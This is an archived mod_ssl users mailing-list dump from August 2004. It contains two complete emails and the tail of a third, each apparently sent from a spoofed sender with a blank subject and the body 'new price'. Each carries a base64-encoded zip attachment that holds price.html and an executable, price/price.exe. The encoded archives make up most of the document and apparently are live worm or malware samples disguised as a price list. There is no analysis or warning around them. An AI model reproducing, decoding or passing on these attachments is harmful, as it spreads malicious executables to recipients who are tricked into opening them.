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

----------royujerihrffcgwnwbyh--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 20:20:15 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B09E8A8D0F; Mon,  9 Aug 2004 20:20:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cliente20.net (233-170-217.xdsl-fixo.ctbcnetsuper.com.br [200.233.170.217])
	by master.modssl.org (Postfix) with SMTP id 6435AA8D0D
	for ; Mon,  9 Aug 2004 20:20:10 +0200 (CEST)
Date: Mon, 09 Aug 2004 15:24:02 -0300
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------lkhhhztbnkgxhhmcsxne"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------lkhhhztbnkgxhhmcsxne
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------lkhhhztbnkgxhhmcsxne
Content-Type: application/octet-stream; name="price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price.zip"

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

----------lkhhhztbnkgxhhmcsxne--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 20:33:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 37A27A8945; Mon,  9 Aug 2004 20:33:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from andy.net (pa-bethelparkcadent1shills1c-27.pit.adelphia.net [24.54.135.27])
	by master.modssl.org (Postfix) with SMTP id 497A2A893A
	for ; Mon,  9 Aug 2004 20:33:08 +0200 (CEST)
Date: Mon, 09 Aug 2004 14:30:54 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ojjwpvwyrcurvztcqlzy"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ojjwpvwyrcurvztcqlzy
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------ojjwpvwyrcurvztcqlzy
Content-Type: application/octet-stream; name="price2.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price2.zip"

UEsDBBQAAAAIANSBCTE3Aq1SCQIAAD4EAAAKAAAAcHJpY2UuaHRtbI1U34+aQBB+v+T+hzke
Ds0V8EfTMxVMLFJj43HNqfWxGZcRt8GFLKte0vi/d1F6LUqa7gNhZ+b7vplhBndDGA1ub9yc
SZ4pSFDEO4zJM77gHmcno6H9e5RAr5Sh2nhmJjkj5/S0tdHsa7xzJtCh+jLzXyZf5zAdhuPF
cBxckrl3lnWmXAnckidwz2NUqbQxy0Jt0YQ5HSSBB4bMaWL0y/A9SS/DwiRUowL7RjLnqWj2
iwTWO8GUvgEXucIkaTTh5+0NlIevoQF/wFmCap3KLdzf11nvPDCXXHQ7JlRYfp8kZVho2ZI0
hlHDDJ/ny0nY7SyHL+EkHNsbtU3MIrFLqCS1k+Ivx7Ga5Kk74OkEnjiTaZ6uFejCSQpSELxm
SSpJmkXeRWNg4EGnNsUoZbstCWUfJFc6QTdd/SCmgEeeEfOVAQce6e/ahg3xeKP0C0swzwu3
P51NRh9b7d6nx8DvWkHgD612O+paveCxbbX0CXod/4PfGhlaiKURrTDX02M+lNPyYBoD1zkL
DipdOAIlOV0UGpLKGWZUqep9bVVK8jjWAR6IEmQXHdplESqy52dvTdcLwRJrL07BgcBVQlGt
yoWaPVMo1UzrHFDSGd4oS333FjQKPg8X0/n3p+dR0LzmLCv/h9rVUJUSdVN0vGrp/0xpDaEm
Ohbb87Y0p11yHLCsQWXDXaf8a/wCUEsDBAoAAAAAAHQ5CTEAAAAAAAAAAAAAAAAGAAAAcHJp
Y2UvUEsDBBQAAAAIAA6CCTGcBSPJ6xMAAAA6AAAPAAAAcHJpY2UvcHJpY2UuZXhl7VoPcBzV
eX+SZSNAGAF2A66biGAITblFOp0OO8WpDulsi8j2WSdZBhybvd2n273b27fZPyedCsRUuMWo
atwEOtPOJOk0tOmElrQUipMyQfxpwK3JmJRp3AAZ4zL0iunUAy5oOgL1996u5JN2z6Vhpgwt
a79v933fe9/73ve+973ve6etNxPSQAhpRJmbI6Sb+M/8++H+5y4ndR7eJpMmpL9hGfnCfZ9I
zeOPkwsbzm9Y3kKaUEn6uJcvAmhFaQt6tvqDNgV95t/ECoRZeLX6bRfeCy+/Ofip9QT8IE+b
L0q9R3LpmIv33csCgfgEGkMsjku2KrsyIS3LfIRot2Jxu278l/xm5GQHQHtQzgu1m/55pnK2
Z2jyjZ3D2cnbmye9luHqWki5f9pd97XZzumJw3NvPrjv14h70XC2+g6mdmAFSOf++cGTJw5x
i7ll757DTzZzBhNPzxQI/jWiLNO4oHNec/VPeJf0bLfXdPjJFpCn0jOZOa91zmuZ82arR0Hl
bxdvwY43EryqWe3ZPd1EcwGqX5ybmzt/+sK7fkR48+YC0T4HBVbHfd77QXlIUFqqvytQpwtN
Gl+OOe90gfOfW815HUjPdL54/rT7ZY47LSSYEcQXQAR+0B+sBSy0PL4y1XPwOTV0aoB3mMnw
2Yn2RwWzN9Dl8sLcnPdGdRlvl65m+PcTmMbkF6v88xv41Mg+Ivr5Qx1BVz7hCd7qqZNrtJf4
kA+gBm4tWutnMK3vonby9C0Lap2dSs9mtF8RPZurz3Gmr+xFrz/GV3dGfBcaoBPS7vP+ywZf
qV9v4PpsIlrTQpfr+dcFaOdXh3lVUF+7FUxI9Tz+jbKv+htQudbIv8b4F28uGlV/2Zd1h4Z5
BWxmCJ9iTZsHiGhzVU2bF0SbwkK7q/aIAd8S6OpvknlBhD7u49W1XExR/QteFaxE9QD/IhLA
VQtNbnuXW4j7GbC/ide/wtscE4t4z3zHuS6OqH4dTTHkJUAfmbtydxsIVw4KmBGwX8BLBVwr
YJuA6wS8WsBrBGwXcJeACQHXC3i9gN0C9gq4RUBVQE1AImCzgC0CtgJ+WM9Dn/bfP8L7JZQ3
